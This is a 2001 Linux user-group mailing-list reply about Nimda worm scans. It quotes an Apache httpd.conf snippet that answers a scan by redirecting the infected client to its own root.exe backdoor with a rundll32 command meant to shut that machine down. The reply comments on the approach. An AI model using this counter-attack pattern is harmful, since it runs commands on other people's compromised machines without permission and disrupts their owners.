[NTLUG:Discuss] Possible new nimda counter-attack.
herrold
herrold at owlriver.com
Wed Oct 10 12:07:22 CDT 2001
hmmm
looking thru my files I also see:
/_vti_bin/* being asked for ...
Your script appears to use the 'try to shut down the remote server'
redirect
Also -- why a 403, rather than a 303 redirect ?
On Wed, 10 Oct 2001, Richard Geoffrion wrote:
> Here is what I added to my httpd.conf file.
>
> # External Redirect of a nimda scan
> <Location /scripts/*/winnt/system32/*>
> Deny from all
> ErrorDocument 403
> http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> owsEx+5", "r"
> # ErrorDocument 403 http://www.yahoo.com
> </Location>
More information about the Discuss
mailing list